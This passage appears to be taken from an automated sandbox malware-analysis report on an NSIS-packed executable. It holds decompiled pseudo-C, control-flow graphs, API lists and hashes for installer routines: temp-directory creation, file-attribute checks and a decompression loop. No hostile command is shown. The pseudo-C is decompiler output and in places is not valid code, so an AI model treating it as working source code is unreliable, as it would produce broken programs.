                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\
                                                  • API String ID: 2962429428-2375930221
                                                  • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                  • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                  • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                  • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe2 641 401631-401634 636->641 642 4015d7-4015ea call 405f64 636->642 644 401663-4022f6 call 401423 641->644 645 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 641->645 649 401604-401607 call 405c16 642->649 650 4015ec-4015ef 642->650 659 402c2a-402c39 644->659 660 40292e-402935 644->660 645->659 662 40165b-40165e 645->662 657 40160c-40160e 649->657 650->649 654 4015f1-4015f8 call 405c33 650->654 654->649 667 4015fa-4015fd call 405b99 654->667 663 401610-401615 657->663 664 401627-40162f 657->664 660->659 662->659 668 401624 663->668 669 401617-401622 GetFileAttributesW 663->669 664->641 664->642 672 401602 667->672 668->664 669->664 669->668 672->657
                                                  C-Code - Quality: 86%
                                                  			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                  0x004015c1
                                                  0x004015c9
                                                  0x004015cc
                                                  0x004015d1
                                                  0x004015d5
                                                  0x004015d7
                                                  0x004015df
                                                  0x004015e1
                                                  0x004015e4
                                                  0x004015ea
                                                  0x00401604
                                                  0x00401607
                                                  0x004015ec
                                                  0x004015ec
                                                  0x004015ef
                                                  0x00000000
                                                  0x004015fa
                                                  0x004015fd
                                                  0x004015fd
                                                  0x004015ef
                                                  0x0040160e
                                                  0x00401615
                                                  0x00401624
                                                  0x00401624
                                                  0x00401617
                                                  0x0040161a
                                                  0x00401622
                                                  0x00000000
                                                  0x00000000
                                                  0x00401622
                                                  0x00401615
                                                  0x00401627
                                                  0x0040162b
                                                  0x0040162c
                                                  0x004015d7
                                                  0x00401634
                                                  0x00401663
                                                  0x004022f1
                                                  0x00401636
                                                  0x00401638
                                                  0x00401645
                                                  0x0040164d
                                                  0x00401655
                                                  0x0040165b
                                                  0x0040165b
                                                  0x00401655
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00405FF0
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                    • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BDC
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp
                                                  • API String ID: 1892508949-3107243751
                                                  • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                  • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                  • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                  • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 673 40603f-40605a call 406668 call 405fe2 678 406060-40606d call 4068ef 673->678 679 40605c-40605e 673->679 683 40607d-406081 678->683 684 40606f-406075 678->684 680 4060b8-4060ba 679->680 686 406097-4060a0 lstrlenW 683->686 684->679 685 406077-40607b 684->685 685->679 685->683 687 4060a2-4060b6 call 405f37 GetFileAttributesW 686->687 688 406083-40608a call 40699e 686->688 687->680 693 406091-406092 call 405f83 688->693 694 40608c-40608f 688->694 693->686 694->679 694->693
                                                  C-Code - Quality: 53%
                                                  			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                  0x0040604b
                                                  0x00406056
                                                  0x0040605a
                                                  0x00406061
                                                  0x0040606d
                                                  0x0040607d
                                                  0x0040607f
                                                  0x00406097
                                                  0x00406098
                                                  0x0040609f
                                                  0x004060a0
                                                  0x00000000
                                                  0x00000000
                                                  0x00406083
                                                  0x0040608a
                                                  0x00406092
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608a
                                                  0x004060a2
                                                  0x004060a8
                                                  0x00000000
                                                  0x004060b6
                                                  0x0040606f
                                                  0x00406075
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406075
                                                  0x0040605c
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00405FF0
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                  • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00406098
                                                  • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560), ref: 004060A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: P_B
                                                  • API String ID: 3248276644-906794629
                                                  • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                  • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                  • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                  • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 696 407194-40719a 697 40719c-40719e 696->697 698 40719f-4071bd 696->698 697->698 699 407490-40749d 698->699 700 4073cb-4073e0 698->700 703 4074c7-4074cb 699->703 701 4073e2-4073f8 700->701 702 4073fa-407410 700->702 704 407413-40741a 701->704 702->704 705 40752b-40753e 703->705 706 4074cd-4074ee 703->706 707 407441 704->707 708 40741c-407420 704->708 709 407447-40744d 705->709 710 4074f0-407505 706->710 711 407507-40751a 706->711 707->709 713 407426-40743e 708->713 714 4075cf-4075d9 708->714 717 406bf2 709->717 718 4075fa 709->718 712 40751d-407524 710->712 711->712 719 4074c4 712->719 720 407526 712->720 713->707 716 4075e5-4075f8 714->716 726 4075fd-407601 716->726 721 406bf9-406bfd 717->721 722 406d39-406d5a 717->722 723 406c9e-406ca2 717->723 724 406d0e-406d12 717->724 718->726 719->703 727 4074a9-4074c1 720->727 728 4075db 720->728 721->716 729 406c03-406c10 721->729 722->700 732 406ca8-406cc1 723->732 733 40754e-407558 723->733 730 406d18-406d2c 724->730 731 40755d-407567 724->731 727->719 728->716 729->718 734 406c16-406c5c 729->734 735 406d2f-406d37 730->735 731->716 736 406cc4-406cc8 732->736 733->716 737 406c84-406c86 734->737 738 406c5e-406c62 734->738 735->722 735->724 736->723 739 406cca-406cd0 736->739 744 406c94-406c9c 737->744 745 406c88-406c92 737->745 742 406c64-406c67 GlobalFree 738->742 743 406c6d-406c7b GlobalAlloc 738->743 740 406cd2-406cd9 739->740 741 406cfa-406d0c 739->741 746 406ce4-406cf4 GlobalAlloc 740->746 747 406cdb-406cde GlobalFree 740->747 741->735 742->743 743->718 748 406c81 743->748 744->736 745->744 745->745 746->718 746->741 747->746 748->737
                                                  C-Code - Quality: 99%
                                                  			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
